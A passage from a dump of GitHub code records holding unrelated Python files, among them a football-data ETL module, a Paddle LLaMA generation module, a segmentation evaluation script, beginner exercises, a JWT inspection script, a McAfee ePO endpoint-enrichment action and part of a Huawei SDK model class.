len(teams)\n elif isinstance(teams, dict):\n return {\"num_home_teams\": len(teams[\"home_teams\"]), \"num_away_teams\": len(teams[\"away_teams\"])}\n\n\ndef create_team_id_mapper(which_data=\"clean\", just_key_comps=True, season=None):\n\n teams = sorted(get_all_team_names(which_data=which_data, just_key_comps=just_key_comps, season=season))\n teams_index = range(1, len(teams)+1)\n team_name_to_index_map = {teams[index-1]:index for index in teams_index}\n \n return team_name_to_index_map\n\n\ndef create_team_name_to_country_mapper(which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n data = data[data.country != \"World\"].copy()\n data.drop_duplicates(subset=\"home_team_name\", keep=\"last\", ignore_index=True, inplace=True)\n data = data[[\"home_team_name\", \"country\"]].copy()\n data.sort_values(by=[\"country\", \"home_team_name\"], inplace=True, ignore_index=True)\n\n teams_index = range(0, len(data))\n team_name_to_country_map = {data.loc[index, \"home_team_name\"]:data.loc[index, \"country\"] for index in teams_index}\n\n return team_name_to_country_map\n\n\ndef create_game_index_to_team_index_mapper(home_or_away, which_data=\"clean\", just_key_comps=True, season=None):\n team_index_mapper = create_team_id_mapper(which_data=which_data, just_key_comps=just_key_comps, season=season)\n \n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)[[\"fixture_id\", f\"{home_or_away}_team_name\"]].copy()\n data[f\"{home_or_away}_index_id\"] = data[f\"{home_or_away}_team_name\"].map(team_index_mapper)\n data = data[[f\"{home_or_away}_index_id\"]]\n \n return data\n\n\ndef create_match_stats_bugs_data(home_or_away, which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n \n match_stat_cols = data.columns.tolist()\n for col in data_cfg[\"MATCH_INFO\"][\"COLUMNS\"]:\n match_stat_cols.remove(col)\n columns = [x for x in match_stat_cols if home_or_away in x]\n\n return data[columns].copy()\n\n\ndef combine_all_bugs_model_data(which_data=\"clean\", just_key_comps=True, season=None):\n num_matches = get_number_of_matches(which_data=which_data, just_key_comps=just_key_comps, season=season)\n num_teams = get_number_of_teams(which_data=which_data, 
just_key_comps=just_key_comps, season=season)\n num_match_stats = get_number_of_match_stats(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n team_id_mapper = create_team_id_mapper(which_data=which_data, just_key_comps=just_key_comps, season=season)\n team_country_mapper = create_team_name_to_country_mapper(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n home_team_game_index = create_game_index_to_team_index_mapper(\"home\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n away_team_game_index = create_game_index_to_team_index_mapper(\"away\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n bugs_model_data_dict = {\n \"num_matches\": num_matches,\n \"num_teams\": num_teams,\n \"num_match_stats\": num_match_stats,\n \"team_id_mapper\": team_id_mapper,\n \"team_country_mapper\": team_country_mapper,\n \"home_team_game_index\": home_team_game_index[\"home_index_id\"].tolist(),\n \"away_team_game_index\": away_team_game_index[\"away_index_id\"].tolist()\n }\n\n home_match_stats = create_match_stats_bugs_data(\"home\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n away_match_stats = create_match_stats_bugs_data(\"away\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n for df in [home_match_stats, away_match_stats]:\n columns = df.columns.tolist()\n home_or_away = columns[0].split(\"_\")[0]\n bugs_model_data_dict[f\"{home_or_away}_match_stats\"] = {}\n for col in columns:\n col_data = df[col].tolist()\n clean_col = col.split(f\"{home_or_away}_\")[-1]\n bugs_model_data_dict[f\"{home_or_away}_match_stats\"][clean_col] = col_data\n \n return bugs_model_data_dict\n\n\ndef create_file_with_all_data_for_bugs_model(which_data=\"clean\", just_key_comps=False, by_season=True):\n BUGS_DIR = cfg['DIRS']['BUGS_DATA']\n os.makedirs(os.path.join(BUGS_DIR, which_data), exist_ok=True)\n\n if by_season:\n seasons = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps).league_season.unique()\n\n bugs_model_data_dict = {}\n for season in seasons:\n bugs_model_data_dict[str(season)] = combine_all_bugs_model_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n filename = \"bugs_model_data_dict_seasons_split.json\"\n with open(os.path.join(BUGS_DIR, which_data, filename), \"w\") as w:\n sjson.dump(bugs_model_data_dict, w, ignore_nan=True)\n \n else:\n bugs_model_data_dict = combine_all_bugs_model_data(which_data=which_data, just_key_comps=just_key_comps)\n filename = \"bugs_model_data_dict_seasons_combined.json\"\n with open(os.path.join(BUGS_DIR, which_data, filename), \"w\") as w:\n sjson.dump(bugs_model_data_dict, w, ignore_nan=True)\n \n print(f\"COMPLETE - All bugs data needed for the model saved in file '{filename}' at\\n{os.path.join(BUGS_DIR, which_data)}\")\n print(dt.today().strftime(\"%d-%m-%Y %H:%M:%S\"))\n","repo_name":"AmirAl-Jumaily/BSc-Project---Football-Match-Simulation","sub_path":"python_files/etl_bugs.py","file_name":"etl_bugs.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25123537835","text":"from typing import List\n\nimport paddle\n\nfrom ppllama.tokenizer import Tokenizer\nfrom ppllama.model import Transformer\n\n\nclass LLaMA:\n def __init__(self, model: Transformer, tokenizer: Tokenizer):\n self.model = model\n self.tokenizer = tokenizer\n\n def generate(\n self,\n prompts: List[str],\n max_gen_len: 
int,\n temperature: float = 0.8,\n top_p: float = 0.95,\n ) -> List[str]:\n bsz = len(prompts)\n params = self.model.params\n assert bsz <= params.max_batch_size, (bsz, params.max_batch_size)\n\n prompt_tokens = [self.tokenizer.encode(x, bos=True, eos=False) for x in prompts]\n\n min_prompt_size = min([len(t) for t in prompt_tokens])\n max_prompt_size = max([len(t) for t in prompt_tokens])\n\n total_len = min(params.max_seq_len, max_gen_len + max_prompt_size)\n\n tokens = paddle.full((bsz, total_len), fill_value=self.tokenizer.pad_id,dtype=\"int64\")\n for k, t in enumerate(prompt_tokens):\n tokens[k, : len(t)] = paddle.to_tensor(t,dtype=\"int64\")\n input_text_mask = tokens != self.tokenizer.pad_id\n start_pos = min_prompt_size\n prev_pos = 0\n for cur_pos in range(start_pos, total_len):\n logits = self.model.forward(tokens[:, prev_pos:cur_pos], prev_pos)\n if temperature > 0:\n probs = paddle.nn.functional.softmax(logits / temperature, axis=-1)\n next_token = sample_top_p(probs, top_p)\n else:\n next_token = paddle.argmax(logits, axis=-1)\n next_token = next_token.reshape([-1])\n # only replace token if prompt has already been generated\n next_token = paddle.where(\n input_text_mask[:, cur_pos], tokens[:, cur_pos], next_token\n )\n tokens[:, cur_pos] = next_token\n prev_pos = cur_pos\n\n decoded = []\n for i, t in enumerate(tokens.tolist()):\n # cut to max gen len\n t = t[: len(prompt_tokens[i]) + max_gen_len]\n # cut to eos tok if any\n try:\n t = t[: t.index(self.tokenizer.eos_id)]\n except ValueError:\n pass\n decoded.append(self.tokenizer.decode(t))\n return decoded\n\n\ndef sample_top_p(probs, p):\n probs_sort = paddle.sort(probs, axis=-1, descending=True)\n probs_idx = paddle.argsort(probs, axis=-1, descending=True)\n probs_sum = paddle.cumsum(probs_sort, axis=-1)\n mask = probs_sum - probs_sort > p\n probs_sort[mask] = 0.0\n probs_sort = probs_sort / (probs_sort.sum(axis=-1, keepdim=True))\n next_token = paddle.multinomial(probs_sort, num_samples=1)\n next_token = gather(probs_idx, -1, next_token)\n\n # test torch multinomial\n # next_token = torch.multinomial(torch.from_numpy(probs_sort.numpy()), num_samples=1)\n # next_token = torch.gather(torch.from_numpy(probs_idx.numpy()), -1, next_token)\n\n return next_token\n\ndef gather(x, axis, index):\n index_shape = index.shape\n index_flatten = index.flatten()\n if axis < 0: # last dim\n axis = x.ndim + axis\n nd_index = []\n for k in range(x.ndim):\n if k == axis:\n nd_index.append(index_flatten)\n else:\n reshape_shape = [1] * x.ndim\n reshape_shape[k] = x.shape[k]\n dim_index = paddle.expand(paddle.arange(x.shape[k], dtype=index.dtype).reshape(reshape_shape),\n index_shape).flatten()\n nd_index.append(dim_index)\n paddle_out = paddle.gather_nd(x, paddle.stack(nd_index, axis=-1)).reshape(index_shape)\n return paddle_out\n\n\nif __name__ == '__main__':\n import numpy as np\n np.random.seed(1)\n # torch.manual_seed(1)\n paddle.seed(1)\n bsz,seq,vocab = 4,10,100\n p=0.8\n logits = np.random.randn(bsz,vocab)\n logits = paddle.to_tensor(logits)\n temperature=1\n probs = paddle.nn.functional.softmax(logits / temperature, axis=-1)\n next_token = sample_top_p(probs,p)\n print(next_token)","repo_name":"jiaohuix/ppllama","sub_path":"ppllama/generation.py","file_name":"generation.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"20"} +{"seq_id":"14908007286","text":"# System libs\nimport os\nimport datetime\nimport argparse\nfrom distutils.version import 
LooseVersion\nfrom multiprocessing import Queue, Process\n# Numerical libs\nimport numpy as np\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom scipy.io import loadmat\n# Our libs\nfrom dataset import ValDataset\nfrom models import ModelBuilder, SegmentationModule\nfrom utils import AverageMeter, colorEncode, accuracy, intersectionAndUnion, parse_devices\nfrom lib.nn import user_scattered_collate, async_copy_to\nfrom lib.utils import as_numpy, mark_volatile\nimport lib.utils.data as torchdata\nimport cv2\n# from tqdm import tqdm\n\n\ndef visualize_result(data, preds, args):\n colors = loadmat('data/color' + args.num_class + '.mat')['colors']\n (img, seg, info) = data\n\n # segmentation\n seg_color = colorEncode(seg, colors)\n\n # prediction\n pred_color = colorEncode(preds, colors)\n\n # aggregate images and save\n im_vis = np.concatenate((img, seg_color, pred_color),\n axis=1).astype(np.uint8)\n\n img_name = info.split('/')[-1]\n cv2.imwrite(os.path.join(args.result,\n img_name.replace('.jpg', '.png')), im_vis)\n\n\ndef evaluate(segmentation_module, loader, args, dev_id, result_queue):\n\n segmentation_module.eval()\n\n for i, batch_data in enumerate(loader):\n # process data\n batch_data = batch_data[0]\n seg_label = as_numpy(batch_data['seg_label'][0])\n\n img_resized_list = batch_data['img_data']\n quadtree_resized_list = batch_data['quadtree']\n \n with torch.no_grad():\n segSize = (seg_label.shape[0], seg_label.shape[1])\n pred = torch.zeros(1, args.num_class, segSize[0], segSize[1])\n pred = Variable(pred).cuda()\n\n for scale, img in enumerate(img_resized_list):\n feed_dict = batch_data.copy()\n feed_dict['img_data'] = img\n if args.eval_mode == 'gt':\n feed_dict['qtree'] = quadtree_resized_list[scale]\n del feed_dict['img_ori']\n del feed_dict['info']\n feed_dict = async_copy_to(feed_dict, dev_id)\n\n # forward pass \n pred_tmp = segmentation_module(feed_dict, segSize=segSize)\n pred = pred + pred_tmp / len(args.imgSize)\n\n _, preds = torch.max(pred.data.cpu(), dim=1)\n preds = as_numpy(preds.squeeze(0))\n\n # calculate accuracy and SEND THEM TO MASTER\n acc, pix = accuracy(preds, seg_label)\n intersection, union = intersectionAndUnion(preds, seg_label, args.num_class)\n result_queue.put_nowait((acc, pix, intersection, union))\n\n # visualization\n if args.visualize:\n visualize_result(\n (batch_data['img_ori'], seg_label, batch_data['info']),\n preds, args)\n\n\ndef worker(args, dev_id, start_idx, end_idx, result_queue):\n torch.cuda.set_device(dev_id)\n\n # Dataset and Loader\n dataset_val = ValDataset(\n args.list_val, args, max_sample=args.num_val,\n start_idx=start_idx, end_idx=end_idx)\n loader_val = torchdata.DataLoader(\n dataset_val,\n batch_size=1,\n shuffle=False,\n collate_fn=user_scattered_collate,\n num_workers=2)\n\n # Network Builders\n builder = ModelBuilder()\n net_encoder = builder.build_encoder(arch=args.arch_encoder,\n fc_dim=args.fc_dim,\n weights=args.weights_encoder)\n if args.eval_mode == 'all':\n sparse_mode = False\n else:\n sparse_mode = True\n \n net_decoder = builder.build_decoder(arch=args.arch_decoder,\n fc_dim=args.fc_dim,\n num_class=args.num_class,\n weights=args.weights_decoder,\n use_softmax=True, \n sparse_mode=sparse_mode)\n\n crit = nn.NLLLoss(ignore_index=-1)\n\n segmentation_module = SegmentationModule(net_encoder, net_decoder, crit)\n\n segmentation_module.cuda()\n\n # Main loop\n evaluate(segmentation_module, loader_val, args, dev_id, result_queue)\n\n\ndef evaluate_simple(segmentation_module, 
loader, args):\n acc_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n\n segmentation_module.eval()\n\n for i, batch_data in enumerate(loader):\n # process data\n batch_data = batch_data[0]\n seg_label = as_numpy(batch_data['seg_label'][0])\n\n img_resized_list = batch_data['img_data']\n\n with torch.no_grad():\n segSize = (seg_label.shape[0], seg_label.shape[1])\n pred = torch.zeros(1, args.num_class, segSize[0], segSize[1])\n pred = Variable(pred).cuda()\n\n for img in img_resized_list:\n feed_dict = batch_data.copy()\n feed_dict['img_data'] = img\n del feed_dict['img_ori']\n del feed_dict['info']\n feed_dict = async_copy_to(feed_dict, args.gpu_id)\n\n # forward pass\n pred_tmp = segmentation_module(feed_dict, segSize=segSize)\n pred = pred + pred_tmp / len(args.imgSize)\n\n _, preds = torch.max(pred.data.cpu(), dim=1)\n preds = as_numpy(preds.squeeze(0))\n\n # calculate accuracy\n acc, pix = accuracy(preds, seg_label)\n intersection, union = intersectionAndUnion(preds, seg_label, args.num_class)\n acc_meter.update(acc, pix)\n intersection_meter.update(intersection)\n union_meter.update(union)\n\n if i % args.disp_iter == 0:\n print('[{}] iter {}, accuracy: {}'\n .format(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), i, acc))\n\n # visualization\n if args.visualize:\n visualize_result(\n (batch_data['img_ori'], seg_label, batch_data['info']),\n preds, args)\n\n iou = intersection_meter.sum / (union_meter.sum + 1e-10)\n for i, _iou in enumerate(iou):\n print('class [{}], IoU: {}'.format(i, _iou))\n\n print('[Eval Summary]:')\n print('Mean IoU: {:.4}, Accuracy: {:.2f}%'\n .format(iou.mean(), acc_meter.average()*100))\n\n return iou\n\n\ndef eval_train(args):\n torch.cuda.set_device(args.gpu_id)\n\n # Network Builders\n builder = ModelBuilder()\n net_encoder = builder.build_encoder(arch=args.arch_encoder,\n fc_dim=args.fc_dim,\n weights=args.weights_encoder)\n net_decoder = builder.build_decoder(arch=args.arch_decoder,\n fc_dim=args.fc_dim,\n num_class=args.num_class,\n weights=args.weights_decoder,\n use_softmax=True)\n\n crit = nn.NLLLoss(ignore_index=-1)\n\n segmentation_module = SegmentationModule(net_encoder, net_decoder, crit)\n\n # Dataset and Loader\n dataset_val = ValDataset(\n args.list_val, args, max_sample=args.num_val)\n loader_val = torchdata.DataLoader(\n dataset_val,\n batch_size=1,\n shuffle=False,\n collate_fn=user_scattered_collate,\n num_workers=5,\n drop_last=True)\n\n segmentation_module.cuda()\n\n # Main loop\n return evaluate_simple(segmentation_module, loader_val, args)\n\n\ndef main(args):\n # Parse device ids\n default_dev, *parallel_dev = parse_devices(args.devices)\n all_devs = parallel_dev + [default_dev]\n all_devs = [x.replace('gpu', '') for x in all_devs]\n all_devs = [int(x) for x in all_devs]\n nr_devs = len(all_devs)\n\n with open(args.list_val, 'r') as f:\n lines = f.readlines()\n nr_files = len(lines)\n if args.num_val > 0:\n nr_files = min(nr_files, args.num_val)\n nr_files_per_dev = math.ceil(nr_files / nr_devs)\n\n # pbar = tqdm(total=nr_files)\n\n acc_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n\n result_queue = Queue(500)\n procs = []\n for dev_id in range(nr_devs):\n start_idx = dev_id * nr_files_per_dev\n end_idx = min(start_idx + nr_files_per_dev, nr_files)\n proc = Process(target=worker, args=(args, dev_id, start_idx, end_idx, result_queue))\n print('process:%d, start_idx:%d, end_idx:%d' % (dev_id, start_idx, end_idx))\n proc.start()\n 
procs.append(proc)\n\n # master fetches results\n processed_counter = 0\n while processed_counter < nr_files:\n if result_queue.empty():\n continue\n (acc, pix, intersection, union) = result_queue.get()\n acc_meter.update(acc, pix)\n intersection_meter.update(intersection)\n union_meter.update(union)\n processed_counter += 1\n # pbar.update(1)\n\n for p in procs:\n p.join()\n\n iou = intersection_meter.sum / (union_meter.sum + 1e-10)\n for i, _iou in enumerate(iou):\n print('class [{}], IoU: {}'.format(i, _iou))\n\n print('[Eval Summary]:')\n print('Mean IoU: {:.4}, Accuracy: {:.2f}%'\n .format(iou.mean(), acc_meter.average()*100))\n\n print('Evaluation Done!')\n\n\nif __name__ == '__main__':\n assert LooseVersion(torch.__version__) >= LooseVersion('0.4.0'), \\\n 'PyTorch>=0.4.0 is required'\n\n parser = argparse.ArgumentParser()\n # Model related arguments\n parser.add_argument('--id', required=True,\n help=\"a name for identifying the model to load\")\n parser.add_argument('--suffix', default='_epoch_20.pth',\n help=\"which snapshot to load\")\n parser.add_argument('--arch_encoder', default='resnet50',\n help=\"architecture of net_encoder\")\n parser.add_argument('--arch_decoder', default='QGN_dense_resnet34',\n help=\"architecture of net_decoder\")\n parser.add_argument('--eval_mode', default='all',\n help=\"propagation scheme for evaluation\")\n parser.add_argument('--fc_dim', default=2048, type=int,\n help='number of features between encoder and decoder')\n\n # Path related arguments\n parser.add_argument('--list_val',\n default='./data/validation_ade20k.odgt')\n parser.add_argument('--root_dataset',\n default='./data/')\n\n # Data related arguments\n parser.add_argument('--num_val', default=-1, type=int,\n help='number of images to evalutate')\n parser.add_argument('--num_class', default=150, type=int,\n help='number of classes')\n parser.add_argument('--transform_dict', default=None,\n help='dictionary to map label ids to train ids')\n parser.add_argument('--imgSize', default=[300,375,450,525,600], nargs='+', type=int,\n help='list of input image sizes.'\n 'for multiscale testing, e.g. 
300 400 500 600')\n parser.add_argument('--imgMaxSize', default=1000, type=int,\n help='maximum input image size of long edge')\n parser.add_argument('--padding_constant', default=32, type=int,\n help='maxmimum downsampling rate of the network')\n\n # Misc arguments\n parser.add_argument('--ckpt', default='./ckpt',\n help='folder to output checkpoints')\n parser.add_argument('--visualize', action='store_true',\n help='output visualization?')\n parser.add_argument('--result', default='./result',\n help='folder to output visualization results')\n parser.add_argument('--devices', default='gpu0',\n help='gpu_id for evaluation')\n\n args = parser.parse_args()\n print(args)\n\n # absolute paths of model weights\n args.weights_encoder = os.path.join(args.ckpt, args.id,\n 'encoder' + args.suffix)\n args.weights_decoder = os.path.join(args.ckpt, args.id,\n 'decoder' + args.suffix)\n\n print(args.weights_encoder, args.weights_decoder)\n assert os.path.exists(args.weights_encoder) and \\\n os.path.exists(args.weights_encoder), 'checkpoint does not exist!'\n\n args.result = os.path.join(args.result, args.id)\n if not os.path.isdir(args.result):\n os.makedirs(args.result)\n\n main(args)\n","repo_name":"kashyap7x/QGN","sub_path":"eval_multipro.py","file_name":"eval_multipro.py","file_ext":"py","file_size_in_byte":12577,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"20"} +{"seq_id":"20530680254","text":"print (\" First way solution\\n \")\n\nx = input(\" Enter 3 digits: \")\nsum_x = int(x[0]) + int(x[1]) + int(x[2])\nprint (f\" Сумма цифр числа {x} равняется {sum_x} \")\n\n###\nprint (\" \\n\\n Second way solution\\n \")\n\nx = int(input( \" Enter 3 digits: \"))\na = x%10 \nb = x%100//10\nc = x//100 \nsum_x = a + b + c\nprint (f\" Сумма цифр числа {x} равняется {sum_x} \")","repo_name":"ArtemBaldin/STUDY","sub_path":"PYTHON_INTRODUCTION/HOMEWORKS/home_work_2.py","file_name":"home_work_2.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21621997205","text":"#!/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python\nimport sys\nfrom jwkest import jwe\nfrom jwkest import jws\n\n__author__ = 'roland'\n\njwt = sys.argv[1]\n\n_jw = jwe.factory(jwt)\nif _jw:\n print(\"jwe\")\nelse:\n _jw = jws.factory(jwt)\n if _jw:\n print(\"jws\")\n print(_jw.jwt.headers)\n print(_jw.jwt.part[1])\n","repo_name":"uetopia/metagame","sub_path":"lib/bin/peek.py","file_name":"peek.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"73632692850","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.path.insert(0, '../../')\n\nfrom src.nlp_proc import tokenizacao\n\ntexto_exemplo = ['o câncer de pulmão é a doença maligna mais comum em todo o mundo; de todos os novos casos de câncer, 13% são de câncer de pulmão.(1) De acordo com o Global Burden of Disease Study 2015']\n\ntext_tokenizado = tokenizacao(texto_exemplo)\nprint(len(texto_exemplo))\nprint(\"----------\")\nprint(len(text_tokenizado))","repo_name":"carlosestevaobs/CompCognitiva","sub_path":"test_app/NLP/compute_tokenizacao.py","file_name":"compute_tokenizacao.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7816696449","text":"from SiemplifyAction import SiemplifyAction\nfrom 
McAfeeMvisionEPOV2Manager import McAfeeMvisionEPOV2Manager\nfrom SiemplifyUtils import output_handler, convert_dict_to_json_result_dict\nfrom ScriptResult import EXECUTION_STATE_COMPLETED, EXECUTION_STATE_FAILED\nfrom TIPCommon import extract_configuration_param, construct_csv\nfrom constants import ENRICH_ENDPOINT_SCRIPT_NAME, INTEGRATION_NAME, ENRICHMENT_PREFIX\nfrom exceptions import DeviceNotFoundException\nfrom SiemplifyDataModel import EntityTypes\n\n\n@output_handler\ndef main():\n siemplify = SiemplifyAction()\n siemplify.script_name = ENRICH_ENDPOINT_SCRIPT_NAME\n siemplify.LOGGER.info('----------------- Main - Param Init -----------------')\n\n # Configuration\n api_root = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='API Root',\n is_mandatory=True)\n\n iam_root = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='IAM Root',\n is_mandatory=True)\n\n client_id = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Client ID',\n is_mandatory=True)\n client_secret = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Client Secret',\n is_mandatory=True)\n api_key = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='API Key',\n is_mandatory=True)\n verify_ssl = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Verify SSL',\n default_value=True, input_type=bool)\n\n scopes = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Scopes',\n is_mandatory=True)\n\n siemplify.LOGGER.info('----------------- Main - Started -----------------')\n status = EXECUTION_STATE_COMPLETED\n result_value = True\n enriched_entities = []\n enriched_entity_identifiers = []\n output_message = ''\n json_results = {}\n missing_entities = []\n failed_entities = []\n suitable_entities = [entity for entity in siemplify.target_entities if entity.entity_type == EntityTypes.ADDRESS\n or entity.entity_type == EntityTypes.HOSTNAME]\n try:\n siemplify.LOGGER.info(\"Connecting to McAfee Mvision ePO V2.\")\n manager = McAfeeMvisionEPOV2Manager(api_root, iam_root, client_id, client_secret, api_key, scopes, verify_ssl,\n siemplify.LOGGER)\n siemplify.LOGGER.info(\"Successfully connected to McAfee Mvision ePO V2.\")\n\n devices = []\n\n for entity in suitable_entities:\n try:\n siemplify.LOGGER.info('Started processing entity: {}'.format(entity.identifier))\n\n device = manager.find_entity_or_fail(entity.identifier,\n is_host=entity.entity_type == EntityTypes.HOSTNAME)\n devices.append(device)\n\n siemplify.LOGGER.info(\"Found device {} for entity {}.\".format(device.device_id, entity.identifier))\n\n json_results[entity.identifier] = device.to_json()\n enriched_entity_identifiers.append(entity.identifier)\n enriched_entities.append(entity)\n entity.additional_properties.update(device.to_enrichment_data(ENRICHMENT_PREFIX))\n entity.is_enriched = True\n\n siemplify.add_entity_insight(entity, device.to_insight())\n\n except DeviceNotFoundException:\n missing_entities.append(entity.identifier)\n siemplify.LOGGER.error(\"No device was found for entity: {}\".format(entity.identifier))\n\n except Exception as e:\n failed_entities.append(entity.identifier)\n siemplify.LOGGER.error(\"An error occurred on entity: {}\".format(entity.identifier))\n siemplify.LOGGER.exception(e)\n\n siemplify.LOGGER.info('Finished processing entity: {}'.format(entity.identifier))\n\n if devices:\n 
siemplify.result.add_data_table(\n title='Devices',\n data_table=construct_csv([device.to_table_data() for device in devices])\n )\n\n if enriched_entities:\n siemplify.update_entities(enriched_entities)\n output_message += 'Successfully enriched the following endpoints from McAfee Mvision ePO V2: \\n{}'.format(\n '\\n'.join(enriched_entity_identifiers))\n\n else:\n siemplify.LOGGER.info('\\n No entities were enriched.')\n output_message = 'No entities were enriched.'\n result_value = False\n\n if missing_entities:\n output_message += '\\n\\nAction was not able to find matching McAfee Mvision ePO V2 devices for the following endpoints: \\n{}'.format(\n '\\n'.join(missing_entities))\n\n if failed_entities:\n output_message += '\\n\\nAction was not able to enrich the following endpoints from McAfee Mvision ePO V2: \\n{}\\n'.format(\n '\\n'.join(failed_entities))\n\n except Exception as e:\n output_message = \"Error executing action '{}'. Reason: {}\".format(\n ENRICH_ENDPOINT_SCRIPT_NAME, e)\n siemplify.LOGGER.error(output_message)\n siemplify.LOGGER.exception(e)\n status = EXECUTION_STATE_FAILED\n result_value = False\n\n siemplify.result.add_result_json(convert_dict_to_json_result_dict(json_results))\n siemplify.LOGGER.info('----------------- Main - Finished -----------------')\n siemplify.LOGGER.info(\n '\\n status: {}\\n result_value: {}\\n output_message: {}'.format(status, result_value, output_message))\n siemplify.end(output_message, result_value, status)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chronicle/tip-marketplace","sub_path":"Integrations/McAfeeMvisionEPOV2/ActionsScripts/EnrichEndpoint.py","file_name":"EnrichEndpoint.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"28122710291","text":"time = input(\"Enter an amount of seconds \")\ntime = int(time)\nx = time % 60\ny = time - x \nminutes = y / 60\na = minutes % 60\nb = minutes - a\nhours = b / 60\nseconds_string = str(x)\nminutes_string= str(a)\nhours_string = str(hours)\nprint(\"{} seconds is equal to {} hours {} minutes {} seconds\".format(time,hours_string,minutes_string,seconds_string))\n","repo_name":"GonzaloChavez/cspp10","sub_path":"unit1/GChavez_seconds.py","file_name":"GChavez_seconds.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21863510609","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass JoinRequestSchema:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'region': 'str',\n 'name': 'str',\n 'email': 'str',\n 'organization': 'str',\n 'phone_number': 'str',\n 'invitation_code': 'str'\n }\n\n attribute_map = {\n 'region': 'region',\n 'name': 'name',\n 'email': 'email',\n 'organization': 'organization',\n 'phone_number': 'phone_number',\n 'invitation_code': 'invitation_code'\n }\n\n def __init__(self, region=None, name=None, email=None, organization=None, phone_number=None, invitation_code=None):\n \"\"\"JoinRequestSchema\n\n The model defined in huaweicloud sdk\n\n :param region: the region of user\n :type region: str\n :param name: the name of user\n :type name: str\n :param email: the email of user\n :type 
email: str\n :param organization: the organization of user\n :type organization: str\n :param phone_number: the phone_number of user\n :type phone_number: str\n :param invitation_code: the invitation_code\n :type invitation_code: str\n \"\"\"\n \n \n\n self._region = None\n self._name = None\n self._email = None\n self._organization = None\n self._phone_number = None\n self._invitation_code = None\n self.discriminator = None\n\n if region is not None:\n self.region = region\n if name is not None:\n self.name = name\n if email is not None:\n self.email = email\n if organization is not None:\n self.organization = organization\n if phone_number is not None:\n self.phone_number = phone_number\n if invitation_code is not None:\n self.invitation_code = invitation_code\n\n @property\n def region(self):\n \"\"\"Gets the region of this JoinRequestSchema.\n\n the region of user\n\n :return: The region of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._region\n\n @region.setter\n def region(self, region):\n \"\"\"Sets the region of this JoinRequestSchema.\n\n the region of user\n\n :param region: The region of this JoinRequestSchema.\n :type region: str\n \"\"\"\n self._region = region\n\n @property\n def name(self):\n \"\"\"Gets the name of this JoinRequestSchema.\n\n the name of user\n\n :return: The name of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this JoinRequestSchema.\n\n the name of user\n\n :param name: The name of this JoinRequestSchema.\n :type name: str\n \"\"\"\n self._name = name\n\n @property\n def email(self):\n \"\"\"Gets the email of this JoinRequestSchema.\n\n the email of user\n\n :return: The email of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._email\n\n @email.setter\n def email(self, email):\n \"\"\"Sets the email of this JoinRequestSchema.\n\n the email of user\n\n :param email: The email of this JoinRequestSchema.\n :type email: str\n \"\"\"\n self._email = email\n\n @property\n def organization(self):\n \"\"\"Gets the organization of this JoinRequestSchema.\n\n the organization of user\n\n :return: The organization of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._organization\n\n @organization.setter\n def organization(self, organization):\n \"\"\"Sets the organization of this JoinRequestSchema.\n\n the organization of user\n\n :param organization: The organization of this JoinRequestSchema.\n :type organization: str\n \"\"\"\n self._organization = organization\n\n @property\n def phone_number(self):\n \"\"\"Gets the phone_number of this JoinRequestSchema.\n\n the phone_number of user\n\n :return: The phone_number of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._phone_number\n\n 